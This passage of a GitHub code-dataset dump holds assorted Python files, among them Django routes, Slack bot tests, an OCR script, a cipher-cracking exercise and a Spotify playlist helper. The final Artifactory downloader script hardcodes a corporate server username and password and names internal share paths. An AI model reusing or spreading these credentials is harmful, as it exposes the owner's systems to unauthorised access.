samp['w2'] = params[:,4]\n samp['w3'] = params[:,5]\n samp['w4'] = params[:,6]\n samp['exp_r'] = params[:,7]\n samp['exp_e1'] = params[:,8]\n samp['exp_e2'] = params[:,9]\n samp['dev_r'] = params[:,10]\n samp['dev_e1'] = params[:,11]\n samp['dev_e2'] = params[:,12]\n\n return samp\n","repo_name":"michaelJwilson/LBGCMB","sub_path":"desihub/desitarget/py/desitarget/mock/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"6115567906","text":"from django.urls import path \r\nfrom . import views\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\nimport os \r\n\r\n\r\n\r\nurl_patterns = [ \r\n path('',views.login),\r\n path('makeroom/',views.makeroom),\r\n path('joinroom/',views.joinroom),\r\n path('chatroom//',views.chatroom), \r\n path('middle/',views.middlewebpage)\r\n]\r\napi_urls = [\r\n path('checkroom//',views.roomcheckApi),\r\n path('makeroom/',views.makeroomApi),\r\n path('makeuser//',views.makeAccountApi),\r\n]\r\n\r\nif settings.DEBUG:\r\n url_patterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\r\n\r\n\r\n\r\n#1:26","repo_name":"mustafahhh/Python-web-projects-","sub_path":"webprojects/Chatting website/web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"458801939","text":"from django.urls import path\nfrom . 
import views\n\n\napp_name = 'body'\nurlpatterns = [\npath('', views.body , name = 'body'),\npath('add', views.addStudent, name = 'add'),\npath('details', views.details, name = 'details'),\npath('edit/', views.editForm , name = 'change'),\n]\n","repo_name":"SuryaVeda/arsu","sub_path":"ARSU/body/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8075025842","text":"#!/usr/bin/env python3\nimport util\nimport acceptance\nimport matplotlib.pyplot as plt\nimport argparse\nimport numpy as np\nimport time\nimport h5py\nimport sys\nimport scipy as sp\nimport timeit\nimport os\nfrom acceptance import datatype as data_type\n\n_defualt_plot_dir = 'plots'\\\n\n\ndef initHDF5File(output_file, name, dtype=data_type):\n\twith h5py.File(output_file, 'a') as f:\n\t \tf.create_dataset(name, (0,), dtype=dtype, maxshape=(None,))\n\ndef updateHDF5File(output_file, name, data):\n\tif len(data):\n\t\twith h5py.File(output_file, 'a') as f:\n\t\t\tndata = len(f[name])\n\t\t\tf[name].resize((ndata+len(data),))\n\t\t\tf[name][ndata:] = data\n\ndef main(dirname, plot_dir=_defualt_plot_dir, data_file_prefix='data_'):\n\n\tfiles = util.get_list_of_h5_files(dirname)\n\tdata = dict()\n\tplotdir = plot_dir + '/'\n\tprefix = plotdir\n\n\tfor ifile, file in enumerate(files):\n\t\tfilename = prefix+data_file_prefix+file.split('/')[-1]\n\t\tprint(filename)\n\t\tif not os.path.exists(filename): \n\t\t\tinitHDF5File(filename, 'data')\n\t\tstart = time.time()\n\t\tfull_start = time.time()\n\t\tprint(file)\n\t\tif True:\n\t\t#try:\n\t\t\tdatalog = h5py.File(file, 'r')\n\t\t\tall_trajectories = datalog['trajectories']\n\t\t\tall_segments = datalog['segments']\n\t\t\tall_vertices = datalog['vertices']\n\t\t\tall_stack = datalog['particle_stack']\n\t\t\tthis_result = acceptance.main(all_segments, all_trajectories, all_stack, all_vertices)\n\t\t\tprint('full time:', time.time()-full_start)\n\t\t\tupdateHDF5File(filename, 'data', this_result)\n\t\t#except:\n\t\t#\tprint('error processing file')\n\t\t#\tcontinue\n\n\treturn\n\n\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--dirname', '-i', type=str, help='''Directory containing edep-sim files converted to hdf5''')\n\tparser.add_argument('--plot_dir', type=str, default=_defualt_plot_dir, help='''Directory name to write plots''')\n\t#parser.add_argument('--tag_muons', action='store_true', default=False, help='''Flag to do muon-tagging analysis. 
Default to false''')\n\targs = parser.parse_args()\n\tc = main(**vars(args))","repo_name":"seg188/Minerva-2x2-Containment-Study","sub_path":"spill_analysis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"43201597294","text":"import os,io\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n#import pandas as pd\nos.environ['GOOGLE_APPLICATION_CREDENTIALS']='learning-perspective-7179ad627978.json'\n\nclient = vision.ImageAnnotatorClient()\n#print (dir(client))\n\nwith io.open(\"abcd.jpeg\",'rb') as image_file:\n    content =image_file.read()\nimage=vision.types.Image(content=content)\nresponse=client.text_detection(image=image)\n#df=pd.DataFrame(columns=['locale','description'])\n# text_annotations is a repeated field; the first annotation holds the full detected text\nprint(response.text_annotations[0].description)","repo_name":"gupta2022/Learning-Perspective","sub_path":"vision_test.py","file_name":"vision_test.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"9284952806","text":"import asynctest\nimport json\nfrom asynctest.mock import call\nfrom asynctest.mock import patch\n\n\nclass TestSlackUser(asynctest.TestCase):\n\n    def setUp(self):\n        patcher1 = patch('charlesbot.slack.slack_connection.SlackConnection.api_call') # NOQA\n        self.addCleanup(patcher1.stop)\n        self.mock_api_call = patcher1.start()\n\n        from charlesbot.slack.slack_connection import SlackConnection\n        self.slack_connection = SlackConnection()\n\n        from charlesbot.slack.slack_user import SlackUser\n        self.su = SlackUser()\n\n    def tearDown(self):\n        self.slack_connection._drop()\n\n    @asynctest.ignore_loop\n    def test_user_equality(self):\n        from charlesbot.slack.slack_user import SlackUser\n        user1 = SlackUser(id=\"SU01\",\n                          name=\"userone\",\n                          color=\"red\")\n        user2 = SlackUser(id=\"SU02\",\n                          name=\"usertwo\",\n                          color=\"blue\")\n        self.assertNotEqual(user1, user2)\n        user2.id = \"SU01\"\n        self.assertNotEqual(user1, user2)\n        user2.name = \"userone\"\n        self.assertNotEqual(user1, user2)\n        user2.color = \"red\"\n        self.assertEqual(user1, user2)\n\n    @asynctest.ignore_loop\n    def test_user_return_string(self):\n        self.su.id = \"SU01\"\n        self.su.name = \"User One\"\n        self.su.deleted = False\n        self.su.is_admin = False\n        self.su.has_2fa = True\n        user_json = json.loads(str(self.su))\n        self.assertEqual(user_json.get('id'), \"SU01\")\n        self.assertEqual(user_json.get('name'), \"User One\")\n        self.assertEqual(user_json.get('deleted'), False)\n        self.assertEqual(user_json.get('is_admin'), False)\n        self.assertEqual(user_json.get('has_2fa'), True)\n        self.assertEqual(user_json.get('is_owner'), \"\")\n\n    def test_empty_slack_response(self):\n        self.su.name = \"suser\"\n        self.mock_api_call.side_effect = [\"{}\"]\n        yield from self.su.retrieve_slack_user_info(self.slack_connection,\n                                                    \"fake123\")\n        expected_call = call(\"users.info\", user=\"fake123\")\n        self.assertEqual(self.mock_api_call.mock_calls,\n                         [expected_call]),\n        self.assertEqual(self.su.name, \"suser\")\n        self.assertEqual(self.su.last_name, \"\")\n        self.assertEqual(self.su.is_bot, \"\")\n\n    def test_no_profile_key(self):\n        self.su.name = \"suser\"\n        user_info = {\n            \"ok\": True,\n            \"user\": {\n                \"id\": \"U023BECGF\",\n                \"name\": \"bobby\"\n            }\n        }\n        self.mock_api_call.side_effect = [json.dumps(user_info)]\n        yield from self.su.retrieve_slack_user_info(self.slack_connection,\n                                                    \"fake123\")\n        expected_call = call(\"users.info\",
user=\"fake123\")\n        self.assertEqual(self.mock_api_call.mock_calls,\n                         [expected_call]),\n        self.assertEqual(self.su.name, \"bobby\")\n        self.assertEqual(self.su.id, \"U023BECGF\")\n        self.assertEqual(self.su.last_name, \"\")\n        self.assertEqual(self.su.is_bot, \"\")\n\n    def test_with_profile_key(self):\n        self.su.name = \"suser\"\n        user_info = {\n            \"ok\": True,\n            \"user\": {\n                \"id\": \"U023BECGF\",\n                \"name\": \"bobby\",\n                \"profile\": {\n                    \"real_name\": \"Bobby Tables\",\n                    \"image_24\": \"https://www.tables.com\",\n                }\n            }\n        }\n        self.mock_api_call.side_effect = [json.dumps(user_info)]\n        yield from self.su.retrieve_slack_user_info(self.slack_connection,\n                                                    \"fake123\")\n        expected_call = call(\"users.info\", user=\"fake123\")\n        self.assertEqual(self.mock_api_call.mock_calls,\n                         [expected_call]),\n        self.assertEqual(self.su.name, \"bobby\")\n        self.assertEqual(self.su.id, \"U023BECGF\")\n        self.assertEqual(self.su.real_name, \"Bobby Tables\")\n        self.assertEqual(self.su.image_24, \"https://www.tables.com\")\n        self.assertEqual(self.su.is_bot, \"\")\n","repo_name":"marvinpinto/charlesbot","sub_path":"tests/slack/test_slack_user.py","file_name":"test_slack_user.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"40"}
+{"seq_id":"11859952767","text":"### LeetCode\n### 336. Palindrome Pairs https://leetcode.com/problems/palindrome-pairs/\n### <Python Algorithm Interview> Problem 57: Palindrome Pairs\n\nfrom typing import List\n\nclass Solution:\n    def is_palindrome(self, merged_string: str) -> bool:\n        left, right = 0, len(merged_string)-1\n        while left < right:\n            if merged_string[left] == merged_string[right]:\n                left += 1\n                right -= 1\n            else:\n                return False\n        return True\n\n    def palindromePairs(self, words: List[str]) -> List[List[int]]:\n        \"\"\"\n        Time Limit Exceeded\n        This problem cannot be solved within the time limit without a Trie data structure\n        \"\"\"\n        answer = list()\n        for idx1 in range(len(words)):\n            for idx2 in range(len(words)):\n                if idx1 == idx2: continue\n                if self.is_palindrome(words[idx1] + words[idx2]):\n                    answer.append([idx1, idx2])\n        return answer\n\nif __name__ == \"__main__\":\n    s = Solution()\n    print(s.palindromePairs(\n        words = [\"abcd\",\"dcba\",\"lls\",\"s\",\"sssll\"]\n    ))\n    print(s.palindromePairs(\n        words = [\"bat\",\"tab\",\"cat\"]\n    ))\n    print(s.palindromePairs(\n        words = [\"a\",\"\"]\n    ))\n","repo_name":"shhommychon/CodingSkillTest-old","sub_path":"Python/Naver_boostcamp/220513_lc_336.py","file_name":"220513_lc_336.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"43802067097","text":"from email import message\nfrom tkinter import*\nfrom tkinter import ttk\nfrom PIL import Image,ImageTk\nfrom tkinter import messagebox\nimport cv2\nimport os\nimport numpy as np\n\nclass train:\n    def __init__(self,root):\n        self.root= root\n        self.root.geometry(\"1530x790+0+0\")\n        self.root.title(\"Train the images\")\n\n\n        #background \n        img=Image.open(r\"C:\\Users\\mukes\\Desktop\\images\\train.png\")\n        img=img.resize((1530,790),Image.ANTIALIAS)\n        self.photo=ImageTk.PhotoImage(img)\n\n        bg_img=Label(self.root,image=self.photo)\n        bg_img.place(x=0,y=0)\n\n        #img1=Image.open(r\"C:\\Users\\mukes\\Desktop\\images\\trim2.png\")\n        #img1=img1.resize((500,500),Image.ANTIALIAS)\n        #self.photo1=ImageTk.PhotoImage(img1)\n\n        #train_img1=Label(bg_img,image=self.photo1)\n        #train_img1.place(x=35,y=140)\n\n        #title_lbl=Label(bg_img,text=\"TRAIN YOUR DATA\",font=(\"calibri\",25,\"bold\"))\n
        #title_lbl.place(x=35,y=20,width=1450,height=50)\n\n        lbl1=Label(bg_img,text=\"CLICK ON THE BUTTON BELOW TO TRAIN YOUR DATA\",font=(\"calibri\",16,\"bold\"),bg=\"orange\",fg=\"black\")\n        lbl1.place(x=540,y=300,width=500,height=50)\n\n        #button\n        train_btn=Button(bg_img,text=\"TRAIN\",command=self.train_classify,width=16,font=(\"calibri\",14,\"bold\"),bg=\"skyblue\",fg=\"black\")\n        train_btn.place(x=680,y=490)\n\n    def train_classify(self):\n        data_dir=(\"data\")\n        path=[os.path.join(data_dir,file) for file in os.listdir(data_dir)]\n\n        faces=[]\n        ids=[]\n\n        for image in path:\n            img=Image.open(image).convert('L') #Gray scale image\n            imageNp=np.array(img,'uint8')\n            id=int(os.path.split(image)[1].split('.')[1])\n\n            faces.append(imageNp)\n            ids.append(id)\n            cv2.imshow(\"Train\",imageNp)\n            cv2.waitKey(1) # brief delay so each training image is rendered\n        ids=np.array(ids)\n\n        #*********train the images*********\n        clf = cv2.face_LBPHFaceRecognizer.create()\n        clf.train(faces,ids)\n        clf.write(\"classifier.xml\")\n        cv2.destroyAllWindows()\n        messagebox.showinfo(\"Result\",\"Training data completed\") \n\n\n\n\n\nif __name__ == \"__main__\":\n    root=Tk()\n    obj=train(root)\n    root.mainloop()","repo_name":"aashay19/Face-Recognition-Project","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"7909738879","text":"import os\nimport json\nimport requests\n\nUSER_NAME = os.environ['USER_NAME']\nPASSWORD = os.environ['PASSWORD']\nCLIENT_ID = os.environ['CLIENT_ID']\nCLIENT_SECRET = os.environ['CLIENT_SECRET']\nPLAYLIST_ID = os.environ['PLAYLIST_ID']\nUSER_ID = os.environ['USER_ID']\nSCOPE = os.environ['SCOPE']\nCALLBACK = os.environ['CALLBACK']\nAUTH_TOKEN = os.environ['AUTH_TOKEN']\nREFRESH_TOKEN = os.environ['REFRESH_TOKEN']\n\n\ndef add_track_to_playlist(track_id):\n    if track_in_is_playlist(track_id):\n        return\n\n    url = 'https://api.spotify.com/v1/playlists/{playlist_id}/tracks?'.format(playlist_id=PLAYLIST_ID)\n    req_headers = get_headers()\n    if not req_headers:\n        return\n\n    req_body = {\"uris\": [\"spotify:track:{track_id}\".format(track_id=track_id)]}\n    r = requests.post(url, headers=req_headers, data=json.dumps(req_body))\n\n    try:\n        r.raise_for_status()\n    except:\n        return\n\n\ndef get_tracks_in_playlist():\n    url = 'https://api.spotify.com/v1/playlists/{playlist_id}/tracks?'.format(playlist_id=PLAYLIST_ID)\n    req_headers = get_headers()\n    if not req_headers:\n        return\n\n    r = requests.get(url, headers=req_headers)\n\n    try:\n        r.raise_for_status()\n        return r.json()\n    except:\n        return\n\n\ndef track_in_is_playlist(track_id):\n    playlist = get_tracks_in_playlist()\n    for item in playlist['items']:\n        if item['track']['id'] == track_id:\n            return True\n    return False\n\n\ndef get_headers():\n    token = get_access_token()\n    if not token:\n        return None\n\n    return {\"Authorization\": \"Bearer {0}\".format(token), 'Content-Type': 'application/json'}\n\n\ndef get_access_token():\n    req_header = {'Authorization': 'Basic {}'.format(AUTH_TOKEN)}\n    req_body = {'grant_type': 'refresh_token', 'refresh_token': REFRESH_TOKEN}\n    r = requests.post('https://accounts.spotify.com/api/token', headers=req_header, data=req_body)\n    res_json = r.json()\n\n    try:\n        access_token = res_json['access_token']\n        return access_token\n    except:\n        return
None","repo_name":"chaneym/anjunabot","sub_path":"function-trackstage/chalicelib/spotify.py","file_name":"spotify.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"29562145908","text":"from collections import Counter\n\n# Read in encrypted and common dictionary words\nwith open('as_encrypted.txt','r') as source:\n    encrypted = source.read()\ncommon_words_string = 'the of and to in a is that for it as was with be by on not he i this are or his from at which but have an had they you were their one all we can her has there been if more when will would who so no when make can like time no just him know take people into year your good some could them see other than then now look only'\n\n# common_words is a list of the 75 most common words in English \ncommon_words = common_words_string.upper().split()\n\n# en_words_common is a list of the 50 most common words in the encrypted text\nen_split = (encrypted.translate({ord(i): None for i in '.,:;_-'})).split()\nen_words_common = [word for word,num in Counter(en_split).most_common(50)]\n\n\n# Here I'm making my decoding dictionary. It'll send encrypted letters to their lowercase version. When I have decoded some letters, they will be sent to their uppercase true value. This will make it easy to investigate specific encoded letters as I'll be able to follow them throughout the text. It'll also allow me to partially decrypt the text as it'll be easy to differentiate between decoded and encoded letters. \n\n# Here I make my decoding dictionary. It will map all non alphabetic characters to themselves \n# and all the encoded characters to the lower case version of themselves.\nalphabet = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\ndecoded_dict = dict(zip(alphabet,[letter.lower() for letter in alphabet]))\nnot_letters = {sym for sym in set(encrypted) if not sym.isalpha()}\ndecoded_dict.update({sym:sym for sym in not_letters})\n\n\ndef decode_list(en_word_list):\n    \"\"\" Returns list of decoded words when given a list \"\"\"\n    return[''.join(word) for word in [[decoded_dict[letter] for letter in word] for word in en_word_list]]\n\n\ndecoded_words = decode_list(en_words_common)\ndecoded_text = decode_list(en_split)\n\n\n# I reasoned that there would be an overlap between the list of the 75 most common words in English and the 50 most common words in the encoded text. I wanted to make a function that could map the most common encoded words to potential matches in the most common words in English. The match function does this, it accepts a list of encoded words that have been passed through the decoded_dict and returns that original list and a list of the potential matches for each word in the original list. \n# \n# To be in this match list the common word must be the same length as the partially/fully encoded word. If there is a known letter in the word then the potential match must have that same letter in the same index. For example, 'Acv' can only be matched to words that start with 'A'. Unknown encoded letters cannot be mapped to letters that are already matched to encoded letters. The mapping of the letters in the encoded word to the letters in the common word must be one to one, one encoded letter is sent to one letter. This means that 'Acv' could not be matched to 'ALL' as then both 'C' and 'V' would be sent to 'L'.
Equally 'Avv' could not be matched to 'AND' as then 'V' would be sent to both 'N' and 'D'\n\n\ndef match(l):\n    def word_match(w):\n        \"\"\" Finds a list of potential matches for a partially/fully encoded word\n        Starts by eliminating all common words that are not the same length as the partially/fully encoded word (w) \"\"\"\n        matches = [word for word in common_words if len(word) == len(w)]\n\n        # If the letter in w is upper then it is a decoded letter so that same letter must be in the same index in all matches\n        # If the letter is lowercase then it is encrypted and can be mapped to any letter that is not already mapped to an encoded letter\n        for i in range(len(w)):\n            if (w[i]).isupper() == True:\n                matches = [word for word in matches if word[i] == w[i]]\n            else:\n                matches = [word for word in matches if word[i] not in decoded_dict.values()]\n        # Making a copy of the current matches so that I can iterate over them while removing items if the mapping isn't one to one\n        matches_copy = [word for word in matches] \n        map_dict = {}\n        # I iterate through all the words in the matches list and then through all the letters in each match.\n        # If it is the first time the letter appears in a word then the match is removed if that encoded letter is being sent to a letter that already has another encoded letter mapped to it.\n        # If the letter has appeared in the word before then the word is removed if that encoded letter is not being mapped to the same letter as it was previously\n        for match in matches_copy:\n            map_dict.clear()\n            for i in range(len(match)):\n                if w[i] not in map_dict:\n                    if match[i] not in map_dict.values():\n                        map_dict[w[i]] = match[i]\n                    else:\n                        matches.remove(match)\n                        break\n                else:\n                    if map_dict[w[i]] == match[i]:\n                        continue \n                    else: \n                        matches.remove(match)\n                        break \n        return(matches)\n    # Returns a list of tuples where the first item in the tuple is an encoded word and the second item is a list of the potential matches for that word.\n    return([(word,word_match(word)) for word in l])\n\n\n# I then created some other functions that would help me best use match.\n# Containing returns all the words in a list containing a particular character. This will allow me to find all instances of a particular encoded letter if I use a lowercase letter as an argument.\n\n\ndef containing(letter, text):\n    \"\"\" Returns a list of all the words in a text that contain a given character \"\"\"\n    return([word for word in text if word.count(letter) >= 1])\n\n\n# This function will let me test my guesses by replacing all instances of a letter with another letter. \ndef replace(orig, new, text):\n    \"\"\" Returns a list of words where all the occurrences of a given character are replaced with a new character \"\"\"\n    return([word.replace(orig, new) for word in containing(orig, text)]) \n\n\n# This function will be very useful as I begin to decode letters. You send as arguments a partially or fully encoded word and that word decoded. It then updates the decoded dict with all the new mappings. It also updates the list of decoded words by decoding the encrypted words with the updated dictionary.\ndef update(en_word, word):\n    \"\"\" Updates the decoded_dict. Takes an encoded word that has been passed through the decoded dict (en_word) and the \n    fully decoded version of that word.
Also updates decoded_words by decoding all the words with the updated decoded dict \"\"\"\n    global decoded_words\n    decoded_dict.update(dict([(en.upper(),de.upper()) for (en,de) in list(zip(en_word,word)) if en.isupper()==False]))\n    decoded_words = decode_list(en_words_common)\n\n\n# The blank function is useful in that it returns a list of all the words in decoded_words that only have one encrypted letter left in them. These are the words where the match function can be very effective as if it finds a match it is quite likely to be right.\ndef blank():\n    \"\"\" Returns a subset of decoded_words where there is only one encoded word left in the word \"\"\"\n    return([word for word in decoded_words if sum([1 for char in word if char.isupper()==False]) == 1])\n\nordered_char = 'e t a o i n s r h l d c u m f p g w y b v k x j q z'.upper()\nchar_dict = dict(zip(ordered_char.split(),range(1,27)))\norder_dict = dict(zip(range(1,27),ordered_char.split()))\nen_chars = (encrypted.translate({ord(i): None for i in ' .,:;_-'}))\nen_char_sorted = Counter(en_chars).most_common(26)\nen_char_dict = {pair[0]:en_char_sorted.index(pair)+1 for pair in en_char_sorted}\nen_order_dict = {en_char_sorted.index(pair)+1:pair[0] for pair in en_char_sorted}\nchar1 = 't o a w b c d s f m r h i y e g l n p u j k'.upper().split()\nchar1_dict = dict(zip(char1,range(1,27)))\norder1_dict = dict(zip(range(1,27),char1))\nen_words = (encrypted.translate({ord(i): None for i in '.,:;_-'})).split()\nen_char1 = Counter([word[0] for word in en_words]).most_common(26)\nen_char_dict1 = {pair[0]:en_char1.index(pair)+1 for pair in en_char1}\nen_order_dict1 = {en_char1.index(pair)+1:pair[0] for pair in en_char1}\nen_char_dict1.update(dict(zip([char for char in alphabet if char not in en_char_dict1],list(range(24,27)))))\n\ndef compare(enletter,letter):\n    print('general frequency',(en_char_dict[enletter],enletter),(char_dict[letter],letter))\n    print('1st letter frequency',(en_char_dict1[enletter],enletter),(char1_dict[letter],letter))\n\ncompare('E','T'),compare('A','H'),compare('W','E')\n\n\n# The most common English word is 'THE' and the most common word in the encoded words was 'EAW'. The frequencies of the encoded letters and the decoded letters also matched well. I deduced they were the same word. \n\nen_words_common[0],common_words[0]\nupdate('eaw','THE')\nmatch(containing('g',decoded_words))\n\n\n# I decided I would send a list of the common encoded words that contained a letter of interest to match. Then I could compare what letters the letter of interest was mapped to in the matches. If the letter of interest was being consistently mapped to one letter then I could deduce that that was the true match. For example, below we can see, for every word with matches, 'g' is being sent to 'A' in at least one of the potential matches. Therefore, I deduced that 'G' is 'A'. I repeated this process for different letters.\nmatch(containing('g',decoded_words))\nupdate('g','A')\n\n\n# I use the blank function to get new letters to try to decode. It's more likely that the match function will be able to find a single correct match for these words than for words with lots of unknowns. It's also easier to see by eye what letter should replace the encoded letter to make a word.
Below I saw the word 'ApE' in the blank list and decided to try and find discover what 'p' was.\nblank()\nmatch(containing('p',decoded_words))\nupdate('p','R')\nblank()\nmatch(containing('m',decoded_words))\nupdate('m','O')\nblank()\nmatch(containing('y',decoded_words))\nupdate('y','S')\nblank()\nmatch(containing('l',decoded_words))\nupdate('l','W')\nblank()\nmatch(containing('o',decoded_words))\nupdate('o','I')\nblank()\nmatch(containing('n',decoded_words))\nupdate('n','F')\nblank()\nmatch(containing('f',decoded_words))\nupdate('Afq','AND')\nblank()\nmatch(containing('x',decoded_words))\nupdate('X','B')\nblank()\nmatch(containing('b',decoded_words))\nupdate('ErERb','EVERY')\nblank()\nmatch(containing('h',decoded_words))\nupdate('SOhIETb','society')\nblank()\nupdate('k','U')\nblank()\nupdate('USEFUu','USEFUL')\nblank()\n(containing('j',decoded_words))\nupdate('j','P')\nblank()\nupdate('s','M')\nblank()\nmatch(containing('x',decoded_words))\nupdate('x','B')\nblank()\nmatch(containing('d',decoded_words))\n\n\n# For some of the less common letters there were no/very little words in the most common encoded words that contained them. So, I searched for all the words that contained them in the whole text. Given I already had so many letters decoded it was easy to see what letter they should be mapped to. I also made to functions to help me. Remaining gives a list of the potential letters the encoded letter of interest could be mapped to. Remaining_en gives a list of all the encoded letters that have not been mapped to a letter yet. \ndef remaining_en():\n \"\"\" Returns a list of encoded letters which have not been mapped to real letters \"\"\"\n return([letter for letter in alphabet if decoded_dict[letter].upper() == letter])\ndef remaining():\n \"\"\" Returns a list of letters where their encoded letter is unknown\n uses global decoded_dict and global alphabet \"\"\"\n return([letter for letter in alphabet if letter not in [char for char in list(decoded_dict.values()) if char.isupper() == True]])\ndecoded_text = decode_list(en_split)\nremaining()\ncontaining('d',decoded_text)\nreplace('d','K', decoded_text)\nupdate('d','K')\nremaining_en()\ncontaining('c',decoded_text)\nupdate('cUDzMENT','judgement')\nupdate('SUxcECT','subject')\nremaining_en()\ncontaining('i',decoded_text)\nupdate('i','Q')\ncontaining('t',decoded_text)\nupdate('t','X')\nremaining_en()\nremaining()\n# I mapped V to Z through process of elimination. 
I now have a complete decoding dictionary that I can use to fully decode the encoded text.\nupdate('v','Z')\ndecrypted = ''.join([decoded_dict[letter] for letter in encrypted])\ndecrypted[:100]\n\n","repo_name":"megregan/datadecoder","sub_path":"decoding_data.py","file_name":"decoding_data.py","file_ext":"py","file_size_in_byte":12600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31957200859","text":"import os\r\nimport shutil\r\n\r\nimport pandas as pd\r\n\r\ndef convert(namecsv):\r\n file_csv = pd.read_csv(f\"Data/{namecsv}\", sep=\",\")\r\n list_csv=[list(x) for x in file_csv.values]\r\n with open(f\"Data_txt/{namecsv[0:8]}.txt\",\"w+\") as file:\r\n for els in list_csv:\r\n for el in els:\r\n file.write(f\"{el} \")\r\n file.write(\"\\n\") \r\n lines = file.readlines()\r\n with open(f\"Data_txt/{namecsv[0:8]}.txt\",\"r+\") as fil:\r\n lines = fil.readlines()\r\n fil.seek(0)\r\n fil.truncate()\r\n fil.writelines(lines[1:])\r\ndef findfileinfolder(path,fileformat):\r\n nat_list = []\r\n for file in os.listdir(path):\r\n if file.endswith(fileformat):\r\n element = os.path.join(file)\r\n nat_list.append(element)\r\n return nat_list\r\n\r\ndef delete_folder():\r\n path = folder_path+\"/Data_txt\"\r\n return shutil.rmtree(path)\r\ndef clear_folder(folder_path):\r\n if os.path.exists(folder_path):\r\n for file_name in os.listdir(folder_path):\r\n file_path = os.path.join(folder_path, file_name)\r\n if os.path.isfile(file_path):\r\n os.remove(file_path)\r\n elif os.path.isdir(file_path):\r\n shutil.rmtree(file_path)\r\n\r\n print(f\"Folder '{folder_path}' has been cleared.\")\r\n else:\r\n print(f\"Folder '{folder_path}' does not exist.\")\r\nscript_path = os.path.abspath(__file__)\r\nfolder_path = os.path.dirname(script_path)\r\nnew_folder = folder_path+\"/Data_txt\"\r\nos.makedirs(new_folder, exist_ok=True)\r\n\r\n\r\n#------- Find csv file code ------------\r\nDataall_csv = findfileinfolder(folder_path+\"/Data\", \".csv\")\r\n#------- Convert csv to txt ------------\r\nfor data_txt in Dataall_csv:\r\n convert(data_txt)\r\n\r\n","repo_name":"ToshDosAzamat/Perovskite","sub_path":"file_manager.py","file_name":"file_manager.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1198939392","text":"import subprocess\r\n\r\njar_file_path = \"engine.jar\"\r\nargument1 = \"orange\"\r\n\r\n# Run the JAR file with arguments\r\nprocess = subprocess.Popen([\"java\", \"-jar\", jar_file_path, argument1], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n\r\n# Wait for the process to finish and get the output\r\noutput, error = process.communicate()\r\nif error:\r\n print(\"Error occurred: {}\".format(error.decode()))\r\nelse:\r\n print(\"Output: {}\".format(output.decode(encoding=\"ISO-8859-1\")))\r\n","repo_name":"ckizp/search-engine","sub_path":"src/linked.py","file_name":"linked.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"22645658326","text":"import sys\nimport os\nimport re\nimport shutil\nimport time\nimport schedule\nfrom loguru import logger\n\nsys.path.append(os.sep.join(os.path.abspath(__file__).split(os.sep)[:-2]))\nfrom vta.api.ArtifaHelper import ArtifaHelper\n\nmylogger = logger.add(\n os.path.join(os.path.dirname(__file__), \"downloads.log\"),\n backtrace=True,\n diagnose=False,\n format=\"{time:YYYY-MM-DD at HH:mm:ss} 
| {level} | {message}\",\n rotation=\"1 week\",\n level=\"INFO\",\n)\n\n\ndef main(credentials, destination):\n autodownloader = ArtifaHelper(**credentials)\n api = \"api/storage/\" + credentials.get(\"repo\")\n\n for file in autodownloader.get_all_files(api):\n uri = file[\"downloadUri\"]\n filename = os.path.basename(uri)\n filepath = os.path.join(autodownloader.dstfolder, filename)\n if re.search(credentials.get(\"pattern\"), uri):\n if not os.path.exists(os.path.join(destination, filename)):\n downloaded = autodownloader.download(uri)\n if autodownloader.checksum(downloaded, file[\"checksums\"][\"sha1\"]):\n try:\n shutil.move(filepath, destination)\n except shutil.Error:\n logger.exception(\"Shutil error!\")\n except Exception as e:\n logger.exception(f\"Unexpected error {e}\")\n else:\n logger.success(\n f\"Moved directory from {filepath} to {destination}.\"\n )\n else:\n logger.error(f\"{downloaded} Checksum does not match!\")\n sys.exit(1)\n else:\n logger.warning(f\"File {filename} already exists.\")\n\n\nif __name__ == \"__main__\":\n destination = r\"\\\\SZHVM00556.APAC.BOSCH.COM\\01_Project\\BinaryExchange\\Zeekr\\System test\\Temp_Version\"\n credentials = {\n \"repo\": \"zeekr/8295_ZEEKR/daily_cx1e/\",\n \"pattern\": \"qfil_.*\",\n \"server\": \"https://hw-snc-jfrog-dmz.zeekrlife.com/artifactory/\",\n \"auth\": (\"bosch-gitauto\", \"Bosch-gitauto@123\"),\n \"multithread\": True,\n }\n\n main(credentials, destination)\n schedule.every().hour.do(main, credentials, destination)\n\n while True:\n schedule.run_pending()\n 